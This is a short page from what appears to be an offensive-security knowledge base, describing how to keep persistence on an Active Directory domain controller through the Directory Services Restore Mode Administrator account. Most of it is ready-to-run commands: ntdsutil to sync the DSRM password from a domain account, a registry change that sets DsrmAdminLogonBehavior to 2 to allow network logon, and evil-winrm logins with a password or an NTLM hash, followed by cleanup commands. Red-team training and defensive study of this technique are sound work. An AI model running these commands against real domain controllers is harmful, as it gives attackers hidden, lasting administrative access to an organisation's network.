Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / Persistence / Techniques

DSRM Persistence

DSRM persistence abuses the Directory Services Restore Mode local Administrator account on a domain controller. If network logon is enabled and the DSRM password is known or synced to a controlled account, the DC has a local authentication path separate from normal domain admin membership.

Check DSRM network logon behavior

reg query HKLM\System\CurrentControlSet\Control\Lsa /v DsrmAdminLogonBehavior

Sync DSRM password from a domain account

ntdsutil "set dsrm password" "sync from domain account student" q q

Enable DSRM network logon

reg add HKLM\System\CurrentControlSet\Control\Lsa /v DsrmAdminLogonBehavior /t REG_DWORD /d 2 /f

Use the local Administrator path

evil-winrm -i 10.10.10.200 -u Administrator -p 'student'
evil-winrm -i 10.10.10.200 -u Administrator -H LOCAL_ADMIN_NTLM

Disable DSRM network logon

reg add HKLM\System\CurrentControlSet\Control\Lsa /v DsrmAdminLogonBehavior /t REG_DWORD /d 0 /f

Reset DSRM password

ntdsutil "set dsrm password" "reset password on server null" q q

Notes

  • DSRM is local to the domain controller.
  • This is not the same as domain Administrator.
  • The dangerous setting is DsrmAdminLogonBehavior=2, which permits network logon using the DSRM account.